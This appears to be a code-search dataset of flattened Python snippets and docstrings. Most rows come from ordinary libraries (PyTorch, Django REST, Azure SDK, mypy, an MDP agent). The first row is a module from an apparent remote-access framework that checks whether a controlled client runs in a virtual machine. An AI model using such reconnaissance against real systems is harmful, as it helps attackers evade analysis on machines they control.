code stringlengths 4 4.48k | docstring stringlengths 1 6.45k | _id stringlengths 24 24 |
|---|---|---|
@config(category="gather", compatibilities=['windows', 'linux', 'darwin']) <NEW_LINE> class CheckVM(PupyModule): <NEW_LINE> <INDENT> dependencies = ['checkvm'] <NEW_LINE> @classmethod <NEW_LINE> def init_argparse(cls): <NEW_LINE> <INDENT> cls.arg_parser = PupyArgumentParser(prog="CheckVM", description=cls.__doc__) <NEW_LINE> <DEDENT> def run(self, args): <NEW_LINE> <INDENT> if self.client.is_windows(): <NEW_LINE> <INDENT> check_vm = self.client.remote('checkvm') <NEW_LINE> vms = check_vm.Check_VM().run() <NEW_LINE> if vms: <NEW_LINE> <INDENT> for vm in vms: <NEW_LINE> <INDENT> self.success(vm) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.error('No Virtual Machine found') <NEW_LINE> <DEDENT> <DEDENT> elif self.client.is_linux(): <NEW_LINE> <INDENT> checkvm = self.client.remote('checkvm', 'checkvm', False) <NEW_LINE> vm = checkvm() <NEW_LINE> if vm: <NEW_LINE> <INDENT> self.success('This appears to be a %s virtual machine' % vm) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.success('This does not appear to be a virtual machine') <NEW_LINE> <DEDENT> <DEDENT> elif self.client.is_darwin(): <NEW_LINE> <INDENT> checkvm = self.client.remote('checkvm', 'checkvm', False) <NEW_LINE> self.info('Be patient, could take a while') <NEW_LINE> vm = checkvm() <NEW_LINE> if vm: <NEW_LINE> <INDENT> self.success('This appears to be a %s virtual machine' % vm) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.success('This does not appear to be a virtual machine') | check if running on Virtual Machine | 62598fab38b623060ffa9039 |
class Constant: <NEW_LINE> <INDENT> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name.lower() <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self.name <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return type(self) == type(self) and self.name == other.name <NEW_LINE> <DEDENT> def __hash__(self): <NEW_LINE> <INDENT> return hash(self.name) | A logic constant is an abstraction of an object.
Assertions or negations can be made of the constant's properties,
which constitute a predicate. | 62598fab2ae34c7f260ab082 |
class Week(callbacks.Plugin): <NEW_LINE> <INDENT> threaded = True <NEW_LINE> def week(self, irc, msg, args, weeknumber): <NEW_LINE> <INDENT> d = datetime.now() <NEW_LINE> curyear, curweek, _ = d.isocalendar() <NEW_LINE> ret = '' <NEW_LINE> if (weeknumber): <NEW_LINE> <INDENT> first_date = self.week_start_date(curyear, weeknumber) <NEW_LINE> last_date = timedelta(6) + first_date <NEW_LINE> ret = str(first_date) + " - " + str(last_date) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> ret = str(curweek) <NEW_LINE> <DEDENT> irc.reply(ret) <NEW_LINE> <DEDENT> week = wrap(week, [optional('int')]) <NEW_LINE> def week_start_date(self, year, week): <NEW_LINE> <INDENT> d = date(year, 1, 1) <NEW_LINE> delta_days = d.isoweekday() - 1 <NEW_LINE> delta_weeks = week <NEW_LINE> if year == d.isocalendar()[0]: <NEW_LINE> <INDENT> delta_weeks -= 1 <NEW_LINE> <DEDENT> delta = timedelta(days=-delta_days, weeks=delta_weeks) <NEW_LINE> return d + delta | Add the help for "@plugin help Week" here
This should describe *how* to use this plugin. | 62598fabaad79263cf42e775 |
class Dropout2d(Module): <NEW_LINE> <INDENT> def __init__(self, p=0.5, inplace=False): <NEW_LINE> <INDENT> super(Dropout2d, self).__init__() <NEW_LINE> self.p = p <NEW_LINE> self.inplace = inplace <NEW_LINE> <DEDENT> def forward(self, input): <NEW_LINE> <INDENT> return self._backend.Dropout2d(self.p, self.training, self.inplace)(input) | Randomly zeroes whole channels of the input tensor.
The input is 4D (batch x channels, height, width) and each channel
is of size (1, height, width).
The channels to zero are randomized on every forward call.
Usually the input comes from Conv2d modules.
As described in the paper "Efficient Object Localization Using Convolutional
Networks" (http:arxiv.org/abs/1411.4280), if adjacent pixels within
feature maps are strongly correlated (as is normally the case in early
convolution layers) then iid dropout will not regularize the activations
and will otherwise just result in an effective learning rate decrease.
In this case, nn.Dropout2d will help promote independence between
feature maps and should be used instead.
Args:
p: probability of an element to be zeroed. Default: 0.5
inplace: If set to True, will do this operation in-place. Default: false
Input Shape: [*, *, *, *] : Input can be of any sizes of 4D shape
Output Shape:Same : Output is of the same shape as input
Examples:
>>> m = nn.Dropout2d(p=0.2)
>>> input = autograd.Variable(torch.randn(20, 16, 32, 32))
>>> output = m(input) | 62598fabdd821e528d6d8ed6 |
class QuestionDetailView(generics.RetrieveAPIView): <NEW_LINE> <INDENT> serializer_class = serializers.QuestionSerializer <NEW_LINE> queryset = Question.objects.all() <NEW_LINE> lookup_url_kwarg = "q_id" | Question detail
Return info about question:
id, title, text, publish date, author username, tags, votes count,
answers count and link to AnswerListView page. | 62598fab0c0af96317c56323 |
class ValueIterationAgent(ValueEstimationAgent): <NEW_LINE> <INDENT> def __init__(self, mdp, discount = 0.9, iterations = 100): <NEW_LINE> <INDENT> T = mdp.getTransitionStatesAndProbs <NEW_LINE> R = mdp.getReward <NEW_LINE> Act = mdp.getPossibleActions <NEW_LINE> self.mdp = mdp <NEW_LINE> self.discount = discount <NEW_LINE> self.iterations = iterations <NEW_LINE> disc = discount <NEW_LINE> values = util.Counter() <NEW_LINE> states = mdp.getStates() <NEW_LINE> for _ in range(iterations): <NEW_LINE> <INDENT> oldval = values.copy() <NEW_LINE> for s in states: <NEW_LINE> <INDENT> curr = [sum(((el[1]*(R(s, a, el[0])+disc*oldval[el[0]]) for el in T(s, a)))) for a in Act(s)] <NEW_LINE> values[s] = max(curr) if len(curr) else 0 <NEW_LINE> <DEDENT> <DEDENT> self.values = values <NEW_LINE> <DEDENT> def getValue(self, state): <NEW_LINE> <INDENT> return self.values[state] <NEW_LINE> <DEDENT> def computeQValueFromValues(self, state, action): <NEW_LINE> <INDENT> T = self.mdp.getTransitionStatesAndProbs <NEW_LINE> R = self.mdp.getReward <NEW_LINE> return sum((el[1]*(R(state, action, el[0])+self.discount*self.values[el[0]]) for el in T(state, action))) <NEW_LINE> <DEDENT> def computeActionFromValues(self, state): <NEW_LINE> <INDENT> bval = -float("inf") <NEW_LINE> b_action = None <NEW_LINE> for a in self.mdp.getPossibleActions(state): <NEW_LINE> <INDENT> new = self.computeQValueFromValues(state, a) <NEW_LINE> if new > bval: <NEW_LINE> <INDENT> bval = new <NEW_LINE> b_action = a <NEW_LINE> <DEDENT> <DEDENT> return b_action <NEW_LINE> <DEDENT> def getPolicy(self, state): <NEW_LINE> <INDENT> return self.computeActionFromValues(state) <NEW_LINE> <DEDENT> def getAction(self, state): <NEW_LINE> <INDENT> return self.computeActionFromValues(state) <NEW_LINE> <DEDENT> def getQValue(self, state, action): <NEW_LINE> <INDENT> return self.computeQValueFromValues(state, action) | * Please read learningAgents.py before reading this.*
A ValueIterationAgent takes a Markov decision process
(see mdp.py) on initialization and runs value iteration
for a given number of iterations using the supplied
discount factor. | 62598fab435de62698e9bd97 |
class ErrorInfo: <NEW_LINE> <INDENT> import_ctx = None <NEW_LINE> file = '' <NEW_LINE> type = '' <NEW_LINE> function_or_member = '' <NEW_LINE> line = 0 <NEW_LINE> message = '' <NEW_LINE> blocker = True <NEW_LINE> def __init__(self, import_ctx: List[Tuple[str, int]], file: str, typ: str, function_or_member: str, line: int, message: str, blocker: bool) -> None: <NEW_LINE> <INDENT> self.import_ctx = import_ctx <NEW_LINE> self.file = file <NEW_LINE> self.type = typ <NEW_LINE> self.function_or_member = function_or_member <NEW_LINE> self.line = line <NEW_LINE> self.message = message <NEW_LINE> self.blocker = blocker | Representation of a single error message. | 62598fab56ac1b37e630218d |
class IRegisteredConfEvent(IObjectEvent): <NEW_LINE> <INDENT> pass | pass | 62598fab71ff763f4b5e7710 |
class GenButtonEvent(wx.CommandEvent): <NEW_LINE> <INDENT> def __init__(self, eventType, id): <NEW_LINE> <INDENT> wx.CommandEvent.__init__(self, eventType, id) <NEW_LINE> self.isDown = False <NEW_LINE> self.theButton = None <NEW_LINE> <DEDENT> def SetIsDown(self, isDown): <NEW_LINE> <INDENT> self.isDown = isDown <NEW_LINE> <DEDENT> def GetIsDown(self): <NEW_LINE> <INDENT> return self.isDown <NEW_LINE> <DEDENT> def SetButtonObj(self, btn): <NEW_LINE> <INDENT> self.theButton = btn <NEW_LINE> <DEDENT> def GetButtonObj(self): <NEW_LINE> <INDENT> return self.theButton | Event sent from the generic buttons when the button is activated. | 62598fabd58c6744b42dc2a7 |
class DraftsRead(object): <NEW_LINE> <INDENT> openapi_types = { 'cursor': 'Cursor', 'data': 'list[DraftMetaRead]' } <NEW_LINE> attribute_map = { 'cursor': 'cursor', 'data': 'data' } <NEW_LINE> def __init__(self, cursor=None, data=None, local_vars_configuration=None): <NEW_LINE> <INDENT> if local_vars_configuration is None: <NEW_LINE> <INDENT> local_vars_configuration = Configuration() <NEW_LINE> <DEDENT> self.local_vars_configuration = local_vars_configuration <NEW_LINE> self._cursor = None <NEW_LINE> self._data = None <NEW_LINE> self.discriminator = None <NEW_LINE> if cursor is not None: <NEW_LINE> <INDENT> self.cursor = cursor <NEW_LINE> <DEDENT> if data is not None: <NEW_LINE> <INDENT> self.data = data <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def cursor(self): <NEW_LINE> <INDENT> return self._cursor <NEW_LINE> <DEDENT> @cursor.setter <NEW_LINE> def cursor(self, cursor): <NEW_LINE> <INDENT> self._cursor = cursor <NEW_LINE> <DEDENT> @property <NEW_LINE> def data(self): <NEW_LINE> <INDENT> return self._data <NEW_LINE> <DEDENT> @data.setter <NEW_LINE> def data(self, data): <NEW_LINE> <INDENT> self._data = data <NEW_LINE> <DEDENT> def to_dict(self): <NEW_LINE> <INDENT> result = {} <NEW_LINE> for attr, _ in six.iteritems(self.openapi_types): <NEW_LINE> <INDENT> value = getattr(self, attr) <NEW_LINE> if isinstance(value, list): <NEW_LINE> <INDENT> result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) <NEW_LINE> <DEDENT> elif hasattr(value, "to_dict"): <NEW_LINE> <INDENT> result[attr] = value.to_dict() <NEW_LINE> <DEDENT> elif isinstance(value, dict): <NEW_LINE> <INDENT> result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> result[attr] = value <NEW_LINE> <DEDENT> <DEDENT> return result <NEW_LINE> <DEDENT> def to_str(self): <NEW_LINE> <INDENT> return pprint.pformat(self.to_dict()) <NEW_LINE> <DEDENT> def 
__repr__(self): <NEW_LINE> <INDENT> return self.to_str() <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> if not isinstance(other, DraftsRead): <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return self.to_dict() == other.to_dict() <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> if not isinstance(other, DraftsRead): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> return self.to_dict() != other.to_dict() | NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually. | 62598fab796e427e5384e735 |
class TestCase(TruncationTestCase): <NEW_LINE> <INDENT> async def _run_outcome(self, outcome, expecting_failure, testMethod) -> None: <NEW_LINE> <INDENT> _restore_default() <NEW_LINE> self.__db__ = Tortoise.get_connection("models") <NEW_LINE> if self.__db__.capabilities.supports_transactions: <NEW_LINE> <INDENT> connection = self.__db__._in_transaction().connection <NEW_LINE> async with TransactionTestContext(connection): <NEW_LINE> <INDENT> await super()._run_outcome(outcome, expecting_failure, testMethod) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> await super()._run_outcome(outcome, expecting_failure, testMethod) <NEW_LINE> <DEDENT> <DEDENT> async def _setUpDB(self) -> None: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> async def _tearDownDB(self) -> None: <NEW_LINE> <INDENT> if self.__db__.capabilities.supports_transactions: <NEW_LINE> <INDENT> _restore_default() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> await super()._tearDownDB() | An asyncio capable test class that will ensure that each test will be run at
separate transaction that will rollback on finish.
This is a fast test runner. Don't use it if your test uses transactions. | 62598fabbd1bec0571e15094 |
@implementer(IPollPlugin) <NEW_LINE> @adapter(IPoll) <NEW_LINE> class PollPlugin(object): <NEW_LINE> <INDENT> @property <NEW_LINE> def name(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> @property <NEW_LINE> def title(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> description = "" <NEW_LINE> selectable = True <NEW_LINE> long_description_tpl = None <NEW_LINE> priority = 100 <NEW_LINE> proposals_min = None <NEW_LINE> proposals_max = None <NEW_LINE> multiple_winners = None <NEW_LINE> recommended_for = None <NEW_LINE> criteria = [] <NEW_LINE> CRITERIA_FAILED = CRITERIA_FAILED <NEW_LINE> CRITERIA_DEPENDS = CRITERIA_DEPENDS <NEW_LINE> CRITERIA_SUCCESS = CRITERIA_SUCCESS <NEW_LINE> CRITERIA_ICONS = CRITERIA_ICONS <NEW_LINE> def __init__(self, context): <NEW_LINE> <INDENT> self.context = context <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def long_description(cls, request): <NEW_LINE> <INDENT> if cls.long_description_tpl is not None: <NEW_LINE> <INDENT> return render(cls.long_description_tpl, {"factory": cls}, request=request) <NEW_LINE> <DEDENT> <DEDENT> @classmethod <NEW_LINE> def get_criteria(cls): <NEW_LINE> <INDENT> for (k, title) in cls.CRITERIA: <NEW_LINE> <INDENT> criteria = getattr(cls, k, None) <NEW_LINE> if isinstance(criteria, Criteria): <NEW_LINE> <INDENT> yield (title, criteria) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def get_vote_schema(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> def get_vote_class(self): <NEW_LINE> <INDENT> return Vote <NEW_LINE> <DEDENT> def get_settings_schema(self): <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> def handle_start(self, request): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def handle_close(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> def render_result(self, view): <NEW_LINE> <INDENT> 
raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> def change_states_of(self): <NEW_LINE> <INDENT> return {} <NEW_LINE> <DEDENT> def render_raw_data(self): <NEW_LINE> <INDENT> return Response(unicode(self.context.ballots)) | Base class for poll plugins. Subclass this to make your own.
It's not usable by itself, since it doesn't implement the required interfaces.
See :mod:`voteit.core.models.interfaces.IPollPlugin` for documentation. | 62598fabdd821e528d6d8ed7 |
class mympirun_vsc_install_scripts(vsc_install_scripts): <NEW_LINE> <INDENT> def run(self): <NEW_LINE> <INDENT> vsc_install_scripts.run(self) <NEW_LINE> for script in self.original_outfiles: <NEW_LINE> <INDENT> if script.endswith(".py") or script.endswith(".sh"): <NEW_LINE> <INDENT> script = script[:-3] <NEW_LINE> <DEDENT> if script.endswith('/mympirun'): <NEW_LINE> <INDENT> rel_script = os.path.basename(script) <NEW_LINE> rel_script_dir = os.path.dirname(script) <NEW_LINE> previous_pwd = os.getcwd() <NEW_LINE> os.chdir(rel_script_dir) <NEW_LINE> for sym_name in MYMPIRUN_ALIASES: <NEW_LINE> <INDENT> if os.path.exists(sym_name): <NEW_LINE> <INDENT> os.remove(sym_name) <NEW_LINE> <DEDENT> os.symlink(rel_script, sym_name) <NEW_LINE> newoutfile = os.path.join(rel_script_dir, sym_name) <NEW_LINE> self.outfiles.append(newoutfile) <NEW_LINE> log.info("symlink %s to %s newoutfile %s" % (rel_script, sym_name, newoutfile)) <NEW_LINE> <DEDENT> os.chdir(previous_pwd) <NEW_LINE> abs_fakepath = os.path.join(self.install_dir, FAKE_SUBDIRECTORY_NAME) <NEW_LINE> if not os.path.isdir(abs_fakepath): <NEW_LINE> <INDENT> log.info("creating abs_fakepath %s" % abs_fakepath) <NEW_LINE> os.mkdir(abs_fakepath) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> log.info("not creating abs_fakepath %s (already exists)" % abs_fakepath) <NEW_LINE> <DEDENT> os.chdir(abs_fakepath) <NEW_LINE> fake_mpirun = os.path.join(abs_fakepath, 'mpirun') <NEW_LINE> if os.path.exists(fake_mpirun): <NEW_LINE> <INDENT> os.remove(fake_mpirun) <NEW_LINE> <DEDENT> mympirun_src = '../%s' % rel_script <NEW_LINE> os.symlink(mympirun_src, 'mpirun') <NEW_LINE> self.outfiles.append(fake_mpirun) <NEW_LINE> log.info("symlink %s to %s newoutfile %s" % (mympirun_src, 'mpirun', fake_mpirun)) <NEW_LINE> os.chdir(previous_pwd) | Create the (fake) links for mympirun
also remove .sh and .py extensions from the scripts | 62598fab30dc7b766599f7ef |
class FollowView(APIView): <NEW_LINE> <INDENT> @staticmethod <NEW_LINE> def post(request): <NEW_LINE> <INDENT> request_user = request.user <NEW_LINE> target_user_id = int(request.data.get('target_user')) <NEW_LINE> target_user = get_user_model().objects.get(pk=target_user_id) <NEW_LINE> create_follow_relationship(request_user, target_user) <NEW_LINE> return Response(status=status.HTTP_201_CREATED) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def get(request): <NEW_LINE> <INDENT> following = get_people_user_follows(request.user) <NEW_LINE> return Response(UserSerializer(following, many=True).data) | A class based view to create and look up follow relationship. | 62598fab1f5feb6acb162bc2 |
class Person: <NEW_LINE> <INDENT> total = 0 <NEW_LINE> def __init__(self, _name, _age): <NEW_LINE> <INDENT> Person.total += 1 <NEW_LINE> self.name = _name <NEW_LINE> self.age = _age <NEW_LINE> <DEDENT> def getAge(self): <NEW_LINE> <INDENT> return self.age <NEW_LINE> <DEDENT> def getName(self): <NEW_LINE> <INDENT> return self.name <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def getTotal(): <NEW_LINE> <INDENT> return Person.total <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def totalPlusN(c, n): <NEW_LINE> <INDENT> return c.total + n <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return "Name - {0}, Age - {1}".format(self.name, self.age) | Person Class with Name and Age as Properties
and Total as a Static Property | 62598fab2c8b7c6e89bd3768 |
class Worker(QRunnable): <NEW_LINE> <INDENT> def __init__(self, fn, *args, **kwargs): <NEW_LINE> <INDENT> super(Worker, self).__init__() <NEW_LINE> self.fn = fn <NEW_LINE> self.args = args <NEW_LINE> self.kwargs = kwargs <NEW_LINE> self.signals = WorkerSignals() <NEW_LINE> self.kwargs['progress_callback'] = self.signals.progress <NEW_LINE> <DEDENT> @pyqtSlot() <NEW_LINE> def run(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> result = self.fn( *self.args, **self.kwargs ) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> traceback.print_exc() <NEW_LINE> exctype, value = sys.exc_info()[:2] <NEW_LINE> self.signals.error.emit((exctype, value, traceback.format_exc())) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.signals.result.emit(result) <NEW_LINE> <DEDENT> finally: <NEW_LINE> <INDENT> self.signals.finished.emit() | Worker thread
Inherits from QRunnable to handler worker thread setup, signals and wrap-up.
:param callback: The function callback to run on this worker thread. Supplied args and
kwargs will be passed through to the runner.
:type callback: function
:param args: Arguments to pass to the callback function
:param kwargs: Keywords to pass to the callback function | 62598fab460517430c43202e |
class Track(object): <NEW_LINE> <INDENT> def __init__( self, filename, track_id=None, track_artist=None, track_title=None, subset=None, path=None ): <NEW_LINE> <INDENT> self.filename = filename <NEW_LINE> try: <NEW_LINE> <INDENT> split_name = filename.split(' - ') <NEW_LINE> self.id = int(split_name[0]) <NEW_LINE> self.artist = split_name[1] <NEW_LINE> self.title = split_name[2] <NEW_LINE> <DEDENT> except ValueError: <NEW_LINE> <INDENT> self.id = 0 <NEW_LINE> self.artist = track_artist <NEW_LINE> self.title = track_title <NEW_LINE> <DEDENT> self.path = path <NEW_LINE> self.subset = subset <NEW_LINE> self.targets = None <NEW_LINE> self.sources = None <NEW_LINE> self._audio = None <NEW_LINE> self._rate = None <NEW_LINE> <DEDENT> @property <NEW_LINE> def audio(self): <NEW_LINE> <INDENT> if self._audio is not None: <NEW_LINE> <INDENT> return self._audio <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if os.path.exists(self.path): <NEW_LINE> <INDENT> audio, rate = sf.read(self.path, always_2d=True) <NEW_LINE> self._rate = rate <NEW_LINE> return audio <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self._rate = None <NEW_LINE> self._audio = None <NEW_LINE> raise ValueError("Oops! %s cannot be loaded" % self.path) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> @property <NEW_LINE> def rate(self): <NEW_LINE> <INDENT> if self._rate is None: <NEW_LINE> <INDENT> if os.path.exists(self.path): <NEW_LINE> <INDENT> audio, rate = sf.read(self.path, always_2d=True) <NEW_LINE> self._rate = rate <NEW_LINE> return rate <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self._rate = None <NEW_LINE> self._audio = None <NEW_LINE> raise ValueError("Oops! 
%s cannot be loaded" % self.path) <NEW_LINE> <DEDENT> <DEDENT> return self._rate <NEW_LINE> <DEDENT> @audio.setter <NEW_LINE> def audio(self, array): <NEW_LINE> <INDENT> self._audio = array <NEW_LINE> <DEDENT> @rate.setter <NEW_LINE> def rate(self, rate): <NEW_LINE> <INDENT> self._rate = rate <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "\n%d >> %s" % (self.id, self.path) | An audio Track which is mixture of several sources
and provides several targets
Attributes
----------
name : str
Track name
path : str
Absolute path of mixture audio file
subset : {'Test', 'Dev'}
belongs to subset
targets : OrderedDict
OrderedDict of mixted Targets for this Track
sources : Dict
Dict of ``Source`` objects for this ``Track`` | 62598faba8370b77170f037e |
class ActionNetwork(object): <NEW_LINE> <INDENT> def __init__(self, p_values, low_action, high_action, stochastic, eps, theta=0.15, sigma=0.2, use_gaussian_noise=False, act_noise=0.1, is_target=False, target_noise=0.2, noise_clip=0.5, parameter_noise=False): <NEW_LINE> <INDENT> deterministic_actions = ( (high_action - low_action) * p_values + low_action) <NEW_LINE> if use_gaussian_noise: <NEW_LINE> <INDENT> if is_target: <NEW_LINE> <INDENT> normal_sample = tf.random_normal( tf.shape(deterministic_actions), stddev=target_noise) <NEW_LINE> normal_sample = tf.clip_by_value(normal_sample, -noise_clip, noise_clip) <NEW_LINE> stochastic_actions = tf.clip_by_value( deterministic_actions + normal_sample, low_action, high_action) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> normal_sample = tf.random_normal( tf.shape(deterministic_actions), stddev=act_noise) <NEW_LINE> stochastic_actions = tf.clip_by_value( deterministic_actions + normal_sample, low_action, high_action) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> exploration_sample = tf.get_variable( name="ornstein_uhlenbeck", dtype=tf.float32, initializer=low_action.size * [.0], trainable=False) <NEW_LINE> normal_sample = tf.random_normal( shape=[low_action.size], mean=0.0, stddev=1.0) <NEW_LINE> exploration_value = tf.assign_add( exploration_sample, theta * (.0 - exploration_sample) + sigma * normal_sample) <NEW_LINE> stochastic_actions = tf.clip_by_value( deterministic_actions + eps * (high_action - low_action) * exploration_value, low_action, high_action) <NEW_LINE> <DEDENT> self.actions = tf.cond( tf.logical_and(stochastic, not parameter_noise), lambda: stochastic_actions, lambda: deterministic_actions) | Acts as a stochastic policy for inference, but a deterministic policy
for training, thus ignoring the batch_size issue when constructing a
stochastic action. | 62598fab1b99ca400228f501 |
class Renderer(FPDF): <NEW_LINE> <INDENT> def __init__(self, music_box_object, paper_size=(279.4, 215.9), strip_separation=0, style={}): <NEW_LINE> <INDENT> super().__init__("l", "mm", paper_size) <NEW_LINE> self.set_author("Mexomagno") <NEW_LINE> self.set_auto_page_break(True) <NEW_LINE> self.set_margins(8, 6, 8) <NEW_LINE> self.alias_nb_pages() <NEW_LINE> self.set_compression(True) <NEW_LINE> self.music_box_object = music_box_object <NEW_LINE> self.strip_separation = strip_separation <NEW_LINE> self.generated = False <NEW_LINE> self.styles = style <NEW_LINE> <DEDENT> def generate(self, midi_file, output_file, song_title="NO-TITLE", song_author="NO-AUTHOR"): <NEW_LINE> <INDENT> if self.generated: <NEW_LINE> <INDENT> raise RuntimeError("Document was already generated!") <NEW_LINE> <DEDENT> self.set_title("{} - {} ({}x{})".format(song_title, song_author, self.w, self.h)) <NEW_LINE> parsed_notes = Parser.render_to_box(midi_file) <NEW_LINE> self.add_page() <NEW_LINE> strip_generator = StripGenerator(music_box_object=self.music_box_object, song_title=song_title, song_author=song_author, styles=self.styles) <NEW_LINE> current_y = - strip_generator.get_height() / 2 - self.strip_separation + self.t_margin <NEW_LINE> drawn_beats = 0 <NEW_LINE> while len(parsed_notes) > 0: <NEW_LINE> <INDENT> new_strip = strip_generator.new_strip(drawn_beats) <NEW_LINE> current_y += strip_generator.get_height() + self.strip_separation <NEW_LINE> if current_y + strip_generator.get_height() / 2 > self.h - self.b_margin: <NEW_LINE> <INDENT> self.add_page() <NEW_LINE> current_y = strip_generator.get_height() / 2 + self.t_margin <NEW_LINE> <DEDENT> parsed_notes, total_strip_beats = new_strip.draw(pdf=self, x0=self.l_margin, x1=self.w - self.r_margin, y=current_y, notes=parsed_notes) <NEW_LINE> drawn_beats += total_strip_beats <NEW_LINE> <DEDENT> self.generated = True <NEW_LINE> self.output(output_file, "F") | Represents a music box document.
All units in mm except for fonts, which are in points. | 62598fab7c178a314d78d43f |
@generic_repr <NEW_LINE> class ActionAbapRsusr002__IT_ACTGRPS(Base, StandardAuthSelectionOptionMixin, BaseMixin): <NEW_LINE> <INDENT> __tablename__ = pluginName+'__IT_ACTGRPS' <NEW_LINE> __table_args__ = {'extend_existing':True} <NEW_LINE> id = Column(Integer, primary_key=True) <NEW_LINE> parent_id = Column(Integer, ForeignKey(pluginName+'__params.id')) <NEW_LINE> LOW = Column(String(30), nullable=False, qt_label='Role Name', qt_description='Role Name', ) <NEW_LINE> HIGH = Column(String(30), nullable=True, qt_label='Role Name', qt_description='Role Name', ) | Selection Options for Roles | 62598fab44b2445a339b6941 |
class BackupPolicyDetails(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'backup_policy_id': {'readonly': True}, 'provisioning_state': {'readonly': True}, 'volumes_assigned': {'readonly': True}, 'volume_backups': {'readonly': True}, } <NEW_LINE> _attribute_map = { 'location': {'key': 'location', 'type': 'str'}, 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'backup_policy_id': {'key': 'properties.backupPolicyId', 'type': 'str'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'daily_backups_to_keep': {'key': 'properties.dailyBackupsToKeep', 'type': 'int'}, 'weekly_backups_to_keep': {'key': 'properties.weeklyBackupsToKeep', 'type': 'int'}, 'monthly_backups_to_keep': {'key': 'properties.monthlyBackupsToKeep', 'type': 'int'}, 'volumes_assigned': {'key': 'properties.volumesAssigned', 'type': 'int'}, 'enabled': {'key': 'properties.enabled', 'type': 'bool'}, 'volume_backups': {'key': 'properties.volumeBackups', 'type': '[VolumeBackups]'}, } <NEW_LINE> def __init__( self, *, location: Optional[str] = None, tags: Optional[Dict[str, str]] = None, daily_backups_to_keep: Optional[int] = None, weekly_backups_to_keep: Optional[int] = None, monthly_backups_to_keep: Optional[int] = None, enabled: Optional[bool] = None, **kwargs ): <NEW_LINE> <INDENT> super(BackupPolicyDetails, self).__init__(**kwargs) <NEW_LINE> self.location = location <NEW_LINE> self.id = None <NEW_LINE> self.name = None <NEW_LINE> self.type = None <NEW_LINE> self.tags = tags <NEW_LINE> self.backup_policy_id = None <NEW_LINE> self.provisioning_state = None <NEW_LINE> self.daily_backups_to_keep = daily_backups_to_keep <NEW_LINE> self.weekly_backups_to_keep = weekly_backups_to_keep <NEW_LINE> self.monthly_backups_to_keep = monthly_backups_to_keep <NEW_LINE> 
self.volumes_assigned = None <NEW_LINE> self.enabled = enabled <NEW_LINE> self.volume_backups = None | Backup policy properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location: Resource location.
:vartype location: str
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:ivar tags: A set of tags. Resource tags.
:vartype tags: dict[str, str]
:ivar backup_policy_id: Backup Policy Resource ID.
:vartype backup_policy_id: str
:ivar provisioning_state: Azure lifecycle management.
:vartype provisioning_state: str
:ivar daily_backups_to_keep: Daily backups count to keep.
:vartype daily_backups_to_keep: int
:ivar weekly_backups_to_keep: Weekly backups count to keep.
:vartype weekly_backups_to_keep: int
:ivar monthly_backups_to_keep: Monthly backups count to keep.
:vartype monthly_backups_to_keep: int
:ivar volumes_assigned: Volumes using current backup policy.
:vartype volumes_assigned: int
:ivar enabled: The property to decide policy is enabled or not.
:vartype enabled: bool
:ivar volume_backups: A list of volumes assigned to this policy.
:vartype volume_backups: list[~azure.mgmt.netapp.models.VolumeBackups] | 62598fab0c0af96317c56325 |
